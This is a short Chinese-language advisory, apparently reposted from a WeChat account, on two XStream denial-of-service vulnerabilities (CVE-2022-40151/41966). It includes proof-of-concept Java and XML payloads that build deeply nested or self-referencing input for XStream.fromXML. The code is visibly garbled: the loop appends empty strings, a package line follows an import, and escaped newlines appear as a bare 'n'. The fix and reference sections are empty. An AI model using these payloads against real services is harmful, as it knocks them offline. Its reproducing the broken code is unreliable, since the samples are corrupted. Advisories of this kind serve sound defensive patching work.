XStream 多个拒绝服务漏洞及POC
CVE-2022-40151/41966
XStream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。
日前,XStream官方通报XStream两个拒绝服务漏洞,分别为CVE-2022-40151和CVE-2022-41966,漏洞影响1.4.19及以前的XStream版本,漏洞等级高危。
NO.1
漏洞描述
<dependency><groupId>com.thoughtworks.xstream</groupId><artifactId>xstream</artifactId><version>1.4.18</version></dependency>
import com.thoughtworks.xstream.XStream;package org.example;import com.thoughtworks.xstream.XStream;public class Main {public static void main(String[] args) {String xml = new String();int i = 0;for( ; i < 10000; ++i) {xml += "";}for( ; i > 0; --i) {xml += "";}XStream xstream = new XStream();xstream.fromXML(xml);}}
xml = "<set>n" +" <set>n" +" <set>n" +" <set>n" +" <set>n" +" <set>n" +" <set>n" +" <string>a</string>n" +" </set>n" +" <set>n" +" <string>b</string>n" +" </set>n" +" </set>n" +" <set>n" +" <string>c</string>n" +" <set reference='../../../set/set[2]'/>n" +" </set>n" +" </set>n" +" </set>n" +" </set>n" +" </set>n" +"</set>";
NO.2
漏洞影响范围
XStream <= 1.4.19
NO.3
修复方案
NO.4
参考链接
原文始发于微信公众号(锋刃科技):XStream 拒绝服务漏洞(CVE-2022-40151/41966)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论